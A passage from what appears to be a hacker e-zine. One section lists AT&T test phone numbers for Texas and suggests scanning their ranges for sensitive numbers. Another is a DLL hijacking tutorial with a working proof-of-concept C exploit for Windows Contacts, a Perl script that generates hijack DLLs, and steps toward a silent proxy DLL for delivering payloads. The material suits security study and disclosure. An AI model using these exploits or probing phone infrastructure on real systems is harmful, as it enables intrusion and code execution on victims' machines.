Seq.map fetchAsync |> Async.Parallel |> Async.RunSynchronously // ..and run it! runAll();; [==================================================================================================] -=[ 0x05 Test Numbers -=[ Author: storm -=[ Email: storm@gonullyourself.org -=[ Website: http://gonullyourself.org/ After doing some extensive Google dorking of the AT&T website, I came across quite a number of documents containing lists of test numbers. The following numbers are from documents pertaining to the Dallas, Houston, and Beaumont regions of Texas. All numbers listed have been confirmed as active at the time of this issue's release. As milliwatts and certain other test numbers are of little direct use to anyone who is not a field technician, one may instead take the opportunity to scan their respective ranges in hope of discovering sensitive and interesting numbers. Descriptions of test numbers are courteously provided by AT&T: "102-type milliwatt provides connection to a 1004 HZ power source (milliwatt) required for one-way transmission testing. Typical features are: - off-hook supervision - 175 millisecond delay - 1004 HZ at a reference level - 1 second interval of on-hook supervision, without tone, every 10 seconds until released - idle circuit termination during on-hook Fixed PADs (TP2, TP9) and PAD switching signals are included in the test line, when required, to furnish proper reference level at switch." 102-type (Milliwatt) ------------ 214-220-0029 214-421-6276 214-489-4250 214-553-0587 214-599-9723 214-746-6309 214-821-2759 281-342-9699 281-346-1399 281-351-1499 281-353-1899 281-356-1499 281-367-1899 281-373-0904 281-376-1499 281-437-1899 281-444-1899 281-445-0125 281-449-1899 281-452-1899 281-456-0080 281-463-1899 281-464-9999 281-471-1499 281-482-1499 281-487-1899 281-489-7499 281-492-1899 281-497-4004 281-498-1499 281-592-1499 281-876-1405 409-245-0917 409-245-0930 409-245-1272 409-384-1200 409-385-1109 409-547-2278 409-746-2401 409-755-0809 409-763-3100 409-836-0538 409-836-1222 409-836-5416 409-866-9111 409-882-8301 409-899-9921 409-938-3241 409-945-8894 713-222-1099 713-433-3499 713-462-1499 713-522-3499 713-532-9999 713-571-9999 713-626-1499 713-638-4097 713-638-4098 713-651-9299 713-661-0088 713-723-2499 713-741-1499 713-771-6099 713-861-1793 713-871-0199 713-928-9020 713-946-1499 713-991-1499 832-242-9999 903-367-7528 903-378-7047 903-496-2607 903-560-1710 903-786-6237 903-873-2785 972-218-0916 972-224-5053 972-225-1399 972-226-3181 972-230-7828 972-241-7355 972-248-5052 972-270-9032 972-286-6419 972-287-1086 972-293-3731 972-308-0013 972-329-1900 972-335-7989 972-347-3264 972-370-0055 972-382-3257 972-472-6426 972-474-8703 972-479-0064 972-483-6122 972-515-3011 972-524-8151 972-542-2213 972-552-1009 972-635-0034 972-709-0277 972-722-8083 972-723-0019 972-782-8696 972-831-8042 972-875-3160 972-923-0047 972-980-4071 979-732-5646 979-885-3780 "105-type (local and toll) provides access to a far-end automatic transmission measuring system (ATMS) responder. Two-way transmission, noise and gain-slope measurements may be made between the far-end responder under control of automatically or manually directed test equipment." 105-type ------------ 281-209-9999 281-342-9599 281-343-1998 281-346-1866 281-351-7121 281-353-2199 281-356-1330 281-367-2199 281-373-0907 281-376-1552 281-437-7429 281-442-2199 281-443-6932 281-444-0970 281-445-1009 281-458-1811 281-463-1199 281-469-2112 281-471-0851 281-474-3233 281-482-2199 281-486-1428 281-489-0044 281-492-1199 281-495-1999 281-497-4005 281-592-4199 281-876-1406 409-384-4639 409-724-3106 409-735-5392 409-762-7098 409-866-9296 409-899-9923 409-938-3238 409-945-8890 409-959-1050 409-971-2406 409-983-3102 409-983-3105 713-223-8847 713-451-2199 713-462-6399 713-472-0037 713-491-9987 713-522-3199 713-571-9997 713-626-1734 713-641-4899 713-651-9799 713-672-9202 713-681-1299 713-682-1499 713-729-2799 713-733-3910 713-741-8566 713-757-9912 713-790-1062 713-861-7399 713-871-1199 713-928-9021 713-946-8506 713-972-1080 713-981-1799 713-991-3728 832-251-0007 972-292-2125 972-734-3006 "108-type non-inverting loopback test line provides for digital testing capabilities between digital exchanges and/or digital PBXs. The digital loopback test line provides a dialable, 4-wire test line capability; it consists of circuitry that accepts and loops back received octets which are retransmitted so that the positions of the bits within the octets are preserved." 108-type (Echo) ------------ 281-227-9998 281-280-0034 281-320-0689 281-343-0785 281-346-2144 281-351-5445 281-356-1810 281-362-0684 281-373-0098 281-399-1580 281-440-1161 281-445-1195 281-471-0060 281-489-3122 281-497-4544 281-593-1299 281-876-1938 409-384-4311 409-763-8270 409-883-3099 409-895-0036 409-933-1301 409-945-8731 409-985-2911 713-472-0122 713-491-9995 713-522-2148 713-571-9998 713-621-2390 713-626-0666 713-638-4059 713-651-1443 713-681-9929 713-690-9987 713-721-1297 713-747-0047 713-757-9913 713-794-0484 713-861-0281 713-910-4522 832-251-0008 Silent lines go off-hook and remain silent until the calling party ends the call. They are generally used to gauge the amount of line noise present. While there were no silent lines listed, a few of the numbers must have been converted since. Silent ------------ 281-331-2297 281-437-2498 281-463-1012 281-484-6006 409-980-0450 713-433-3599 713-461-0501 972-747-9999 The following numbers were marked as test numbers but have either died or been assigned to other purposes: Incorrect ------------ 214-375-9999 - VMB (469-855-9941) 214-398-5209 - HELO 214-429-9999 - VMB 214-465-9999 - "The feature you are attempting to use is either not recognized on this system is or not currently available for you to use" - 1-800-331-0500 (Message 8; CT01UN) 214-623-9999 - "It is not necessary to dial a 1 or 0 when calling this number" 214-654-9308 - DISCO 214-845-9999 - "Either the number you dialed is not a working number or must be dialed with the correct area code plus seven digits" 214-951-9999 - DISCO or NIS 214-987-3711 - DISCO 281-331-2009 - CBCAD (119T) 281-341-9499 - DISCO or NIS 281-458-8499 - reorder 281-479-1899 - DISCO or NIS 281-479-2199 - reorder 281-485-4304 - answering machine 281-485-6686 - fax 281-487-2299 - DISCO or NIS 281-488-1499 - DISCO or NIS 281-492-0652 - answering machine 281-498-0733 - DISCO or NIS 281-585-6649 - "not a working number" (Message 3; CT01UN) 281-689-2714 - DISCO or NIS 281-689-3123 - DISCO or NIS 281-825-1000 - VMB 281-938-3241 - CBCAD (119T) 409-233-1330 - reorder 409-234-2063 - ACB (119T) 409-234-7903 - reorder 409-234-7912 - CBCAD (?? 3) 409-239-3188 - Verizon Wireless "changed, DISCO, or NIS" (Announcement 2; switch 12-4) 409-239-3193 - Verizon Wireless "changed, DISCO, or NIS" (Announcement 2; switch 12-4) 409-265-0316 - reorder 409-265-0325 - reorder 409-265-5512 - CBCAD (119T) 409-279-5153 - reorder 409-279-6999 - reorder 409-279-9520 - reorder 409-291-0054 - HELO 409-291-8327 - apartment complex 409-336-8332 - CBCAD (119T) 409-336-8372 - reorder 409-398-2071 - reorder 409-398-2510 - reorder 409-398-5089 - CBCAD (119T) 409-532-0041 - NIS 409-532-1660 - NIS 409-532-2386 - NIS 409-543-1582 - "temporarily NIS" (Message 3; Switch 60) 409-543-8109 - HELO 409-543-8134 - "The number or code you have dialed is incorrect. Please check the number or code and try again." (Message 7; Switch 60) 409-560-3978 - CBCAD (119T) 409-560-3994 - reorder 409-564-0258 - CBCAD (119T) 409-598-2242 - reorder 409-598-2405 - reorder 409-598-2547 - reorder 409-724-3102 - DISCO or NIS 409-729-9908 - ring out to "Your party is not answering. Please try your call later. We're sorry, but your call will now be disconnected." (038T) 409-735-2199 - DISCO or NIS 409-736-0179 - busy 409-736-1828 - "we're sorry, your call cannot be completed to the access code you selected. Please check the code and dial again or call your long-distance company for assistance." 409-737-2668 - "not a working number" (Message 3; CT01UN) 409-738-2025 - doesn't even ring 409-740-3566 - CBCAD (092T) 409-740-8925 - reorder 409-740-8933 - CBCAD (003T) 409-752-3881 - DISCO or NIS 409-752-5680 - DISCO or NIS 409-769-1109 - DISCO or NIS 409-826-3150 - CBCAD (119T) 409-826-4869 - reorder 409-826-6600 - reorder 409-848-0692 - reorder 409-848-2309 - CBCAD (119T) 409-848-2317 - CBCAD (119T) 409-857-3400 - reorder 409-866-0691 - ring out to "Your party is not answering. Please try your call later. We're sorry, but your call will now be disconnected." (038T) 409-882-8303 - doesn't even ring 409-922-8179 - reorder 409-963-2359 - "we're sorry, your call cannot be completed to the access code you selected. Please check the code and dial again or call your long-distance company for assistance." 409-999-9999 - CBCAD (119T) 713-221-1678 - ring out, no bridge 713-271-1299 - DISCO or NIS 713-453-8599 - DISCO or NIS 713-467-0599 - DISCO or NIS 713-468-2099 - DISCO or NIS 713-469-1499 - Verizon Wireless "not available at this time" (Announcement 1; switch 12-3) 713-472-5199 - busy 713-474-2199 - DISCO or NIS 713-641-4799 - CBCAD (119T) 713-661-3099 - DISCO or NIS 713-663-1599 - DISCO or NIS 713-671-0140 - does not accept blocked Caller ID 713-672-1499 - "not a working number" (Message 3; CT01UN) 713-692-2199 - HELO 713-692-7099 - CBCAD (013T) 713-734-4399 - reorder 713-790-1799 - ring out, no bridge 713-884-1000 - "not a working number" (Message 3; CT01UN) 713-972-1194 - DISCO 903-327-9999 - CBCAD (119T) 903-441-9999 - HELO 903-467-9999 - VMB (not set up yet) 903-626-4085 - DISCO 936-349-9999 - DISCO or NIS (Brookvale? 2) 972-266-9999 - "Either the number you dialed is not a working number or must be dialed with the correct area code plus seven digits" 972-352-9999 - NIS (Message TX09080656) 972-570-9999 - DISCO or NIS 972-837-2119 - "Either the number you dialed is not a working number or must be dialed with the correct area code plus seven digits" 972-924-2095 - "Either the number you dialed is not a working number or must be dialed with the correct area code plus seven digits" [==================================================================================================] -=[ 0x06 Practical DLL Hijacking -=[ Author: storm -=[ Email: storm@gonullyourself.org -=[ Website: http://gonullyourself.org/ Table of Contents I. Introduction II. Threat or No Threat? III. Background on DLL Hijacking IV. Developing a Proof of Concept V. Real-World Attack Examples VI. Omg Hax I. Introduction =============== A recent craze has been forming over a new attack vector known as "DLL hijacking." This paper is meant to inform the reader about what exactly this attack vector is, how it works, and how to develop a proof of concept exploit for it. I will also be covering some more advanced topics, such as how DLL hijacking may be used in a practical manner to deliver malicious payloads, and I will also introduce a new utilization of this attack to silently execute code on a remote system. II. Threat or No Threat? ======================== There has been a lot of discussion about whether or not DLL hijacking actually presents any sort of security risk, and at first look, one may agree that these concerns hold some merit. In a typical scenario, an attacker would already need to possess a significant level of access to the target machine and its filesystem in order to perform a hijack, so the question remains that if such a level of access has already been achieved, then why would time and resources be wasted on a DLL hijack? Instead, an attacker would probably have the power to simply tamper with the targeted program itself or execute a downloaded binary with the same user permissions. If an average DLL hijacking scenario doesn't grant escalated privileges to an attacker, then what the heck use is it? DLL hijacking is appropriate in situations where an attacker does not have actual interactive access to a target system but is still able to pass files to it, such as when a user downloads content through BitTorrent or plugs in a USB thumb drive. In both of these situations, DLL files may be planted on a system in specific relation to other key files in the absence of the attacker maintaining any interactive access to the machine at all. When executed properly, this attack is very effective and very dangerous. DLL hijacking won't bring about the destruction of all computing as the media generally makes any vulnerability out to be (I'm assuming it won't), but it certainly has its place as a valid security concern that must be addressed. In any regard, the vendors seem to be taking it seriously: From: "Adobe PSIRT" Subject: Adobe Report Date: Mon, August 30, 2010 11:26 am To: "storm@gonullyourself.org" Cc: "Adobe PSIRT" Hello sToRm, We noticed you posted a report on the Exploit database about an issue affecting an Adobe product: Adobe Photoshop CS2 DLL Hijacking Exploit (Wintab32.dll), http://www.exploit-db.com/exploits/14741. We are currently investigating how to resolve the issue. We definitely appreciate your feedback about the security of our products, and encourage you to contact us directly in the event you find any further issues, or have additional information you would like to share about the issue already reported. Please contact us at PSIRT@adobe.com. Thank you very much, Wendy Adobe Product Security Incident Response Team III. Background on DLL Hijacking ================================ First, let's answer the question of what a DLL file is. Basically, DLL files (the acronym stands for "dynamic-link library") are Windows's version of shared libraries, which are packages of different subroutines that grant greater functionality to programs. Directly quoting a Microsoft article, "For example, in Windows operating systems, the Comdlg32 DLL performs common dialog box related functions." Numerous DLL files exist, each providing unique functionality. To cite another example, when loaded by a program, the wsock32.dll file offers an interface to the Windows Sockets API. Above, I mentioned that DLL files are shared libraries, not static libraries. This is a key piece of information in the context of our attack. To further explain, shared libraries are loaded at run-time, unlike static libraries which are loaded at compile-time. The functionality provided by static libraries is compiled directly into the binary itself, whereas the functionality provided by shared libraries is compiled separately and copied into memory once loaded by the program. By using shared libraries, the overall program size decreases since the executable is only storing a table of required functions instead of the actual functions themselves. This process is referred to as dynamic linking. Dynamic linking offers many advantages over static linking (which you may have figured the definition of already), just as static linking offers many advantages over dynamic linking. For instance, as previously stated, dynamic linking decreases the overall size of the final executable. Shared libraries may also be easily updated without the need for recompiling the affected program. Additionally, dynamic linking promotes the reusage of code and allows such libraries to be called upon by multiple programs at the same time. Quoting the book "An Introduction to GCC: for the GNU compilers gcc and g++," "Most operating systems also provide a virtual memory mechanism which allows one copy of a shared library in physical memory to be used by all running programs, saving memory as well as disk space." Dynamic linking provides both efficient usage of resources and flexibility in programming. This flexibility, however, is what causes programs to be vulnerable to DLL hijacking. When specifying a DLL file to be loaded by a program, a programmer has various options. First, s/he may call the library using an absolute path, such as "C:\Windows\system32\wsock32.dll". Second, s/he may call the library using a relative path, such as "..\..\Windows\system32\wsock32.dll". Third, s/he may call the library simply by defining "wsock32.dll" with no path. This third option is of particular interest to us due to the way Windows attempts to locate DLL files with no definite path. The following lists are from various Microsoft KB articles and the ACROS Security Blog. Asterisks denote families of functions. When the LoadLibrary* functions are evoked, the following locations are searched for the requested file: 1. The directory from which the application loaded 2. The system directory 3. The 16-bit system directory 4. The Windows directory 5. The current working directory (CWD) 6. The directories that are listed in the PATH environment variable When the SeachPath, CreateProcess*, and LoadModule functions are evoked, the following locations are searched for the requested file: 1. The directory from which the application loaded 2. The current working directory (CWD) 3. The system directory 4. The 16-bit system directory 5. The Windows directory 6. The directories that are listed in the PATH environment variable When the ShellExecute* functions are evoked, the following locations are searched for the requested file: 1. The current working directory (CWD) 2. The 32-bit System directory (Windows\System32) 3. The 16-bit System directory (Windows\System) 4. The Windows directory (Windows) 5. The directories in the PATH environment variable 6. The directories specified in the App Paths registry key When the WinExec function is evoked, the following locations are searched for the requested file: 1. The directory from which the application loaded. 2. The current working directory (CWD) 3. The Windows system directory. The GetSystemDirectory function retrieves the path of this directory. 4. The Windows directory. The GetWindowsDirectory function retrieves the path of this directory. 5. The directories listed in the PATH environment variable. When the _spawn*p* and _exec*p* functions are evoked, the following locations are searched for the requested file: 1. The current working directory (CWD) 2. The 32-bit system directory (Windows\System32) 3. The Windows directory (Windows) 4. The directories in the PATH environment variable You may have already formulated an idea about what can happen here. If a DLL file is loaded by means of the third path, then there is a good chance that the load function is searching a few other directories before finding it. If an attacker places a DLL file containing malicious code in a directory that is searched before the correct one is, then it will be loaded (with privileges of the calling progam) instead of the real DLL, leading to arbitrary code execution. This is a DLL hijacking attack. IV. Developing a Proof of Concept ================================= It is fairly simple to develop a working exploit for DLL hijacking. In this section, I will guide you through the process of finding a vulnerable application, identifying hijackable DLL files, and creating your own DLL files to be hijacked. For the scope of this tutorial, I will target Microsoft's Windows Contacts program (tested on Vista SP2 and 7 Ultimate). First, download and extract Process Monitor (available at [1]), which we will use to track the filesystem activity of Windows Contacts. After opening it, add the following filters: Process Name is wab.exe then Include Path ends with .dll then Include Result is NAME NOT FOUND then Include Doing this restricts the program's output just to what we are interested in (requests to load nonexistent DLL files by wab.exe). Create an empty file named "test.wab", where .wab is a file extension associated with Windows Contacts. Double-click on test.wab, which will open the Windows Contacts program. Scrolling down, you should see something similar to the following events: wab.exe CreateFile C:\Program Files\Windows Mail\wab32res.dll NAME NOT FOUND wab.exe CreateFile C:\Windows\System32\wab32res.dll NAME NOT FOUND wab.exe CreateFile C:\Windows\system\wab32res.dll NAME NOT FOUND wab.exe CreateFile C:\Windows\wab32res.dll NAME NOT FOUND wab.exe CreateFile C:\Users\storm\Desktop\New Folder\Windows Contacts\wab32res.dll NAME NOT FOUND wab.exe CreateFile C:\Program Files\Windows Mail\wab32res.dll NAME NOT FOUND wab.exe CreateFile C:\Perl\site\bin\wab32res.dll NAME NOT FOUND wab.exe CreateFile C:\Perl\bin\wab32res.dll NAME NOT FOUND wab.exe CreateFile C:\Program Files\PHP\wab32res.dll NAME NOT FOUND wab.exe CreateFile C:\Windows\System32\wab32res.dll NAME NOT FOUND wab.exe CreateFile C:\Windows\wab32res.dll NAME NOT FOUND wab.exe CreateFile C:\Windows\System32\wbem\wab32res.dll NAME NOT FOUND wab.exe CreateFile C:\Windows\System32\WindowsPowerShell\v1.0\wab32res.dll NAME NOT FOUND wab.exe CreateFile C:\Windows\wbin\wab32res.dll NAME NOT FOUND wab.exe CreateFile C:\Program Files\Nmap\wab32res.dll NAME NOT FOUND This string of failed attempts to load a single DLL file is what we are looking for. First, the directory that wab.exe was executed from is checked for wab32res.dll, where it is not found. Next, it checks three Windows directories, where it is also not found. Then, it checks the current working directory (where the .wab file was loaded from), and then, finally, it enumerates PATH as a last resort. By observing this trend, we can assume that the program attempts to load wab32res.dll using either the LoadLibrary or LoadLibraryEx method. In case you are interested, by removing the "NAME NOT FOUND" filter, you can see all requests to load DLL files, successful or not. By doing so, we can see that Windows Contacts was ultimately successful in loading wab32res.dll a little further down: wab.exe CreateFile C:\Program Files\Common Files\System\wab32res.dll SUCCESS wab.exe QueryBasicInformationFile C:\Program Files\Common Files\System\wab32res.dll SUCCESS wab.exe CloseFile C:\Program Files\Common Files\System\wab32res.dll SUCCESS wab.exe CreateFile C:\Program Files\Common Files\System\wab32res.dll SUCCESS wab.exe CreateFileMapping C:\Program Files\Common Files\System\wab32res.dll FILE LOCKED WITHONLY READERS wab.exe CreateFileMapping C:\Program Files\Common Files\System\wab32res.dll SUCCESS wab.exe Load Image C:\Program Files\Common Files\System\wab32res.dll SUCCESS wab.exe CloseFile C:\Program Files\Common Files\System\wab32res.dll SUCCESS So, now that we've identified wab32res.dll as a viable point of attack, the next step is to craft our own DLL file. Since we've deduced that the DLL file is being loaded with one of the LoadLibrary functions, we can employ the help of the DllMain callback function. We know this because, according to [2], "When the system starts or terminates a process or thread, it calls the entry-point function for each loaded DLL using the first thread of the process. The system also calls the entry-point function for a DLL when it is loaded or unloaded using the LoadLibrary and FreeLibrary functions." This means that the contents of DllMain() in our code will be executed upon loading of the DLL file. The following code is directly from the KB article just mentioned: BOOL WINAPI DllMain( __in HINSTANCE hinstDLL, __in DWORD fdwReason, __in LPVOID lpvReserved ); So let's use this code and actually make it do something. The classic proof of concept is to execute Calculator: /* Exploit Title: Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll) Date: August 25, 2010 Author: storm (storm@gonullyourself.org) Tested on: Windows Vista SP2 http://www.gonullyourself.org/ gcc -shared -o wab32res.dll Contacts-DLL.c .contact, .group, .p7c, .vcf, and .wab files are affected. */ #include int hax() { WinExec("calc", 0); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { hax(); return 0; } Here, we have the DllMain() function call hax(), which simply executes calc.exe and exits. In case you're wondering, you can determine which file extensions are associated with which programs through Control Panel > Default Programs. Compile and put your new wab32res.dll in the same directory as any .contact, .group, .p7c, .vcf, or .wab file. The file can be empty - just as long as it has one of those file extensions. Open the file, and you should see a Calculator window open. :) We are done with the proof of concept process for this program. However, if the targeted program does not load a DLL using a LoadLibrary function, then we are not able to use DllMain() to execute our code. If this is the case, then we must construct our new DLL file in a different manner. We must create a template of every export function provided by the real DLL file, but instead of the actual functionality, each function simple runs our hax() function. For this example, I will use rpawinet.dll, which is loaded insecurely by Live! Cam Avatar Creator (CrazyTalk4 for short). It's essentially some useless program that came pre-installed on my computer, so I figured I would utilize it somehow. First, download and extract DLL Export Viewer from [3]. Run the program, and load the DLL file you wish to examine (in this case, rpawinet.dll). A list of the export functions should display in the window. Ctrl+A to select all, and Ctrl+S to save to a text file. The contents of the text file should look something like: ================================================== Function Name : HttpFilterBeginningTransaction Address : 0x100011d0 Relative Address : 0x000011d0 Ordinal : 1 (0x1) Filename : rpawinet.dll Full Path : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll Type : Exported Function ================================================== ================================================== Function Name : HttpFilterClose Address : 0x100011dd Relative Address : 0x000011dd Ordinal : 2 (0x2) Filename : rpawinet.dll Full Path : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll Type : Exported Function ================================================== ================================================== Function Name : HttpFilterOnBlockingOps Address : 0x100011ea Relative Address : 0x000011ea Ordinal : 3 (0x3) Filename : rpawinet.dll Full Path : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll Type : Exported Function ================================================== ================================================== Function Name : HttpFilterOnResponse Address : 0x100011f7 Relative Address : 0x000011f7 Ordinal : 4 (0x4) Filename : rpawinet.dll Full Path : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll Type : Exported Function ================================================== ================================================== Function Name : HttpFilterOnTransactionComplete Address : 0x10001204 Relative Address : 0x00001204 Ordinal : 5 (0x5) Filename : rpawinet.dll Full Path : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll Type : Exported Function ================================================== ================================================== Function Name : HttpFilterOpen Address : 0x10001211 Relative Address : 0x00001211 Ordinal : 6 (0x6) Filename : rpawinet.dll Full Path : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll Type : Exported Function ================================================== Using a simple Perl script, we can enumerate the function names in this text file and output them in correct format for our DLL source. use strict; use warnings; open FILE, '<', @ARGV or die $!; print "#include \n#define DllExport __declspec (dllexport)\n\n"; while () { print "DllExport void $1() { hax(); }\n" if ($_ =~ /Function Name\s+: (\w+)/); }; print "\nint hax()\n{\n WinExec(\"calc\", 0);\n exit(0);\n return 0;\n}"; This should output: #include #define DllExport __declspec (dllexport) DllExport void HttpFilterBeginningTransaction() { hax(); } DllExport void HttpFilterClose() { hax(); } DllExport void HttpFilterOnBlockingOps() { hax(); } DllExport void HttpFilterOnResponse() { hax(); } DllExport void HttpFilterOnTransactionComplete() { hax(); } DllExport void HttpFilterOpen() { hax(); } int hax() { WinExec("calc", 0); exit(0); return 0; } I think you know what to do from here. :) If you are interested, HD Moore has written a DLL hijacking auditing kit that automates checking every associated file extension on one's computer to find potential program vulnerabilities. You can find this tool at [4]. V. Real-World Attack Examples ============================= There are many avenues for DLL hijacking that turn a number of seemingly safe activities into potential security threats. I myself will not go too deeply into this section simply because other articles have done a good job describing the vulnerable scenarios, so I will instead provide a guide to these resources. The article "Exploiting DLL Hijack in the real world" at [5] (mirror: [6]) provides a few good examples of possible attack scenarios. The main points of the article are "Using a SMB/WebDav shared folder," "A compressed package (.zip, .tar.gz, .rar etc)," "Torrents," and "Exploiting multiple application hijacks." The article "New DLL Hijacking Exploits (many!)" at [7] steps through an example WebDAV attack using Metasploit. "Autorun DLL Hijacker (USB stick)" at [8] attempts to compormise a system through the AutoRun feature of USB thumb drives. On another note, we only covered creating proof of concept DLLs that don't really do much. Also, since we are either removing the functionality of the export functions or the actual export functions themselves, the hijacked program is going to crash if we remove the "exit(0);" line. Let's learn how to execute our payload while still maintaining the functionality of the original DLL file, effectively creating a silent attack. We will achieve this through the use of a "proxy DLL." A proxy DLL is exactly what it sounds like - a DLL file that acts as an intermediary to another DLL file. These are used to intercept and alter program calls, most commonly to add "extra functionality" to games. For this quick section, I'll be referencing the article [9] as our method of creating proxy DLL files. The source wrappit.cpp [10] is provided by the article to automate the process, which you can instead download from [11] to avoid the mandatory registration bullshit. As I am still unfamiliar with the true power of proxy DLLs, I will only introduce you to this concept and recommend you to guide yourself through the process by reading the documentation linked above. The CodeProject article does a pretty good job explaining how to use the tool. Make sure that the appropriate development environment is installed (I am using Microsoft Visual C++ Express). I will use the example wsock32.dll as in the article: C:\Users\storm\Desktop\src>"C:\Program Files\Microsoft Visual Studio 10.0\VC\bin\vcvars32.bat" Setting environment for using Microsoft Visual Studio 2010 x86 tools. C:\Users\storm\Desktop\src>dumpbin /exports C:\Windows\System32\wsock32.dll > exports.txt C:\Users\storm\Desktop\src>type exports.txt Microsoft (R) COFF/PE Dumper Version 10.00.30319.01 Copyright (C) Microsoft Corporation. All rights reserved. Dump of file C:\Windows\System32\wsock32.dll File Type: DLL Section contains the following exports for WSOCK32.dll 00000000 characteristics 4A5BC955 time date stamp Mon Jul 13 19:55:01 2009 0.00 version 1 ordinal base 1142 number of functions 75 number of names ordinal hint RVA name 1141 0 AcceptEx (forwarded to MSWSOCK.AcceptEx) 1111 1 EnumProtocolsA (forwarded to MSWSOCK.EnumProtocolsA) 1112 2 EnumProtocolsW (forwarded to MSWSOCK.EnumProtocolsW) 1142 3 GetAcceptExSockaddrs (forwarded to MSWSOCK.GetAcceptExSockaddrs) 1109 4 GetAddressByNameA (forwarded to MSWSOCK.GetAddressByNameA) 1110 5 GetAddressByNameW (forwarded to MSWSOCK.GetAddressByNameW) 1115 6 GetNameByTypeA (forwarded to MSWSOCK.GetNameByTypeA) 1116 7 GetNameByTypeW (forwarded to MSWSOCK.GetNameByTypeW) 1119 8 GetServiceA (forwarded to MSWSOCK.GetServiceA) 1120 9 GetServiceW (forwarded to MSWSOCK.GetServiceW) 1113 A GetTypeByNameA (forwarded to MSWSOCK.GetTypeByNameA) 1114 B GetTypeByNameW (forwarded to MSWSOCK.GetTypeByNameW) 24 C MigrateWinsockConfiguration (forwarded to MSWSOCK.MigrateWinsockConfigurat ion) 1130 D NPLoadNameSpaces (forwarded to MSWSOCK.NPLoadNameSpaces) 1117 E SetServiceA (forwarded to MSWSOCK.SetServiceA) 1118 F SetServiceW (forwarded to MSWSOCK.SetServiceW) 1140 10 TransmitFile (forwarded to MSWSOCK.TransmitFile) 500 11 WEP (forwarded to ws2_32.WEP) 102 12 WSAAsyncGetHostByAddr (forwarded to ws2_32.WSAAsyncGetHostByAddr) 103 13 WSAAsyncGetHostByName (forwarded to ws2_32.WSAAsyncGetHostByName) 105 14 WSAAsyncGetProtoByName (forwarded to ws2_32.WSAAsyncGetProtoByName) 104 15 WSAAsyncGetProtoByNumber (forwarded to ws2_32.WSAAsyncGetProtoByNumber) 107 16 WSAAsyncGetServByName (forwarded to ws2_32.WSAAsyncGetServByName) 106 17 WSAAsyncGetServByPort (forwarded to ws2_32.WSAAsyncGetServByPort) 101 18 WSAAsyncSelect (forwarded to ws2_32.WSAAsyncSelect) 108 19 WSACancelAsyncRequest (forwarded to ws2_32.WSACancelAsyncRequest) 113 1A WSACancelBlockingCall (forwarded to ws2_32.WSACancelBlockingCall) 116 1B WSACleanup (forwarded to ws2_32.WSACleanup) 111 1C WSAGetLastError (forwarded to ws2_32.WSAGetLastError) 114 1D WSAIsBlocking (forwarded to ws2_32.WSAIsBlocking) 1107 1E WSARecvEx (forwarded to MSWSOCK.WSARecvEx) 109 1F WSASetBlockingHook (forwarded to ws2_32.WSASetBlockingHook) 112 20 WSASetLastError (forwarded to ws2_32.WSASetLastError) 115 21 WSAStartup (forwarded to ws2_32.WSAStartup) 110 22 WSAUnhookBlockingHook (forwarded to ws2_32.WSAUnhookBlockingHook) 1000 23 WSApSetPostRoutine (forwarded to ws2_32.WSApSetPostRoutine) 151 24 __WSAFDIsSet (forwarded to ws2_32.__WSAFDIsSet) 1 25 accept (forwarded to ws2_32.accept) 2 26 bind (forwarded to ws2_32.bind) 3 27 closesocket (forwarded to ws2_32.closesocket) 4 28 connect (forwarded to ws2_32.connect) 1106 29 dn_expand (forwarded to MSWSOCK.dn_expand) 51 2A gethostbyaddr (forwarded to ws2_32.gethostbyaddr) 52 2B gethostbyname (forwarded to ws2_32.gethostbyname) 57 2C gethostname (forwarded to ws2_32.gethostname) 1101 2D getnetbyname (forwarded to MSWSOCK.getnetbyname) 5 2E getpeername (forwarded to ws2_32.getpeername) 53 2F getprotobyname (forwarded to ws2_32.getprotobyname) 54 30 getprotobynumber (forwarded to ws2_32.getprotobynumber) 55 31 getservbyname (forwarded to ws2_32.getservbyname) 56 32 getservbyport (forwarded to ws2_32.getservbyport) 6 33 getsockname (forwarded to ws2_32.getsockname) 7 34 0000186E getsockopt 8 35 htonl (forwarded to ws2_32.htonl) 9 36 htons (forwarded to ws2_32.htons) 10 37 inet_addr (forwarded to ws2_32.inet_addr) 1100 38 inet_network (forwarded to MSWSOCK.inet_network) 11 39 inet_ntoa (forwarded to ws2_32.inet_ntoa) 12 3A ioctlsocket (forwarded to ws2_32.ioctlsocket) 13 3B listen (forwarded to ws2_32.listen) 14 3C ntohl (forwarded to ws2_32.ntohl) 15 3D ntohs (forwarded to ws2_32.ntohs) 1102 3E rcmd (forwarded to MSWSOCK.rcmd) 16 3F 000017A8 recv 17 40 00001808 recvfrom 1103 41 rexec (forwarded to MSWSOCK.rexec) 1104 42 rresvport (forwarded to MSWSOCK.rresvport) 1108 43 s_perror (forwarded to MSWSOCK.s_perror) 18 44 select (forwarded to ws2_32.select) 19 45 send (forwarded to ws2_32.send) 20 46 sendto (forwarded to ws2_32.sendto) 1105 47 sethostname (forwarded to MSWSOCK.sethostname) 21 48 000018E0 setsockopt 22 49 shutdown (forwarded to ws2_32.shutdown) 23 4A socket (forwarded to ws2_32.socket) Summary 1000 .data 1000 .reloc 1000 .rsrc 3000 .text C:\Users\storm\Desktop\src>g++ wrappit.cpp -o wrappit.exe C:\Users\storm\Desktop\src>wrappit.exe wsock32.dll exports.txt __stdcall C:\\Windows\\System32\\wsoc k32.dll wsock32.cpp wsock32.def Wrappit. Copyright (C) Chourdakis Michael Usage: WRAPPIT ================================================================== Step 1: Parsing exports.txt... Step 1: 75 exported functions parsed. ------------------------------------------ Step 2: Generating .DEF file wsock32.def... Step 2: 75 exported functions written to DEF. ------------------------------------------ Step 3: Generating .CPP file wsock32.cpp... cl : Command line warning D9035 : option 'Wp64' has been deprecated and will be removed in a future release wsock32.cpp Creating library wsock32.lib and object wsock32.exp Generating code Finished generating code C:\Users\storm\Desktop\src> And this is where I will leave you. :) VI. Omg Hax =========== Many flaws in web browsers allow files to be downloaded to a victim's computer but not executed (arbitrary file download), leaving the attacker hoping that it's opened either intentionally or accidentally. With DLL hijacking, exploits such as these do not have to rely on a user directly interacting with the file, which usually leads to exposure of an attack. Instead, a 